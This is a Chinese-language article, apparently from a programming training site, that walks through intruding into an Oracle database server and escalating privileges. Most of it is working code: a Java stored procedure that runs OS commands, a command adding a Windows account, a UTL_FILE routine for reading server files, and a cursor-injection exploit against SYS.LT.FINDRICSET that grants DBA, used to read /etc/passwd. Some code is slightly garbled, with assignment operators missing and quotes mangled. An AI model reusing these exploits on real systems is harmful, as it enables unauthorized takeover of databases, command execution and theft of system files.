软件开发培训班 >> 编程开发 >> Oracle


Oracle服务器入如何进一步获取想过关权限

  本文标签:Oracle服务器

  以下的文章主要介绍的是入侵Oracle服务器的进一步获取想过关权限,我们可以很快的连接上Oracle数据库服务器,此时你会发现:以下的几种情况,即,连接后不是dba权限,还有不能利用SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES漏洞提升权限  。

  还有的一种情况就是运行SELECT UTL_HTTP.request(‘http://xxxxxxxxxxx/login.jsp’) FROM dual 后发现Oracle服务器不能连接网络  。

  幸运的是,

  运行

  

  1. create or replace function Linx_Query (p varchar2) 
    return number authid current_user is begin execute immediate p; return 1;end; 

  成功!这个用户具有create proceduce权限  。

  此时马上想到创建java扩展执行命令:

  

  1. create or replace and compile java source named “LinxUtil” as import java.io.*; 
    public class LinxUtil extends Object {public static String runCMD(String args) 
    {try{BufferedReader     myReadernew BufferedReader
    (new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); 
    String stemp,    str=”";while ((stemp = myReader.readLine()) != null) str +=stemp+” 
    “;myReader.close();return str;} catch (Exception e){return e.toString();}}}  
  2. begin dbms_java.grant_permission(‘PUBLIC’, ‘SYS:java.io.FilePermission’, ‘<>’, ‘execute’ );end;  
  3. create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name 
    ‘LinxUtil.runCMD(java.lang.String) return String’  
  4. select * from all_objects where object_name like ‘%LINX%’  
  5. grant all on LinxRunCMD to public  
  6. select LinxRunCMD(‘cmd /c net user linx /add’) from dual  

  

  但是在第一步就卡住了,Oracle服务器由于某种未知原因 不能创建java扩展!!

  还好,我们还有UTL库可以利用:

  

  1. create or replace function LinxUTLReadfile 
    (filename varchar2) return varchar2 is  
  2. fHandler UTL_FILE.FILE_TYPE;  
  3. buf varchar2(4000);  
  4. output varchar2(8000);  
  5. BEGIN  
  6. fHandler :UTL_FILE.FOPEN(‘UTL_FILE_DIR’, filename, ‘r’);  
  7. loop  
  8. begin  
  9. utl_file.get_line(fHandler,buf);  
  10. DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||buf);  
  11. exception  
  12. when no_data_found then exit;  
  13. end;  
  14. output :output||buf||chr(10);  
  15. end loop;  
  16. UTL_FILE.FCLOSE(fHandler);  
  17. return output;  
  18. END;  

  

  UTL_FILE_DIR需要先用:

  

  1. CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS ‘/etc’; 

  指定目  。但运行后发现没有权限  。只好想办法提权  。

  游标注射

  老外写了N个pdf介绍这技术,我精简了代码:

  

  1. DECLARE  
  2. MYC NUMBER;  
  3. BEGIN  
  4. MYC :DBMS_SQL.OPEN_CURSOR;  
  5. DBMS_SQL.PARSE(MYC,’declare pragma autonomous_transaction; 
    begin execute immediate ”GRANT DBA TO linxlinx_current_db_user”;commit;end;’,0);  
  6. DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);  
  7. BEGIN SYS.LT.FINDRICSET(‘.”||dbms_sql.execute( ‘||MYC||’ )||””)–’,x’); END;  
  8. raise NO_DATA_FOUND;  
  9. EXCEPTION  
  10. WHEN NO_DATA_FOUND THEN DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);  
  11. WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);  
  12. END;   

  

  运行后重新连接就有dba权限了,简单吧……

  现在可以读取文件了:

  

  1. CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS ‘/etc’;  
  2. select LinxUTLReadfile(‘passwd’) from dual  

  

  后面就简单了,不写了  。 以上的相关内容就是对入侵Oracle服务器进一步获取权限的介绍,望你能有所收获  。